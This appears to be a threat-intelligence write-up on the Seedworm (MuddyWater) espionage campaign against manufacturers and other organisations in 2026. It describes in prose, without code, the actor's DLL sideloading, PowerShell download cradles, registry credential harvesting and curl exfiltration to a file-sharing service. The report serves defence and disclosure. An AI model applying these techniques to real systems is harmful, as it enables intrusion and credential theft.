Seedworm Espionage Campaign Against Electronics Manufacturers: Credential Theft, DLL Sideloading, and Covert Exfiltration

Seedworm, an Iran-aligned threat actor tracked under aliases including MERCURY, MuddyWater, Temp Zagros, and Static Kitten, has been observed conducting a broad espionage campaign that reached 9 organizations across 9 countries in Q1 2026 alone. Confirmed victims include government agencies and an international airport in the Middle East, electronics and industrial manufacturers in Southeast Asia and South Korea, a financial services provider in Latin America, and education, public-sector, and professional services organizations across multiple regions. First detected in February 2026, the intrusion chain reflects a notable tradecraft evolution toward quieter, more disciplined operations, with Node.js orchestration replacing raw PowerShell to keep activity away from script-block logging, and multiple credential-theft tools deployed so that blocking any single binary does not halt the operation.

Initial execution is orchestrated through Node.js scripts that invoke PowerShell for download cradles and secondary payloads fetched from a hard-coded staging IP and a secondary attacker-owned domain, giving the operator two independent fetch channels. The group stages malicious DLLs alongside legitimate, signed binaries from vendors such as Fortemedia and SentinelOne, exploiting DLL search-order loading to execute implants under the cover of trusted software. Persistence is established via a Run registry key pointing to the sideloaded payload, and a dedicated proxy tool provides a covert relay channel back to attacker-controlled infrastructure.

Seedworm conducts systematic reconnaissance prior to lateral movement: operators run whoami, ipconfig, net commands, and WMI queries against the SecurityCenter2 namespace to enumerate users, domain groups, and installed security products. Credential material harvested from SAM, SECURITY, and SYSTEM registry hives as well as browser profile stores is staged in the Windows Temp directory and exfiltrated using curl with multipart form upload to the public file-sharing service sendit.sh. The use of anonymous file-transfer infrastructure and legitimate signed binaries reflects a deliberate effort to blend into normal endpoint activity.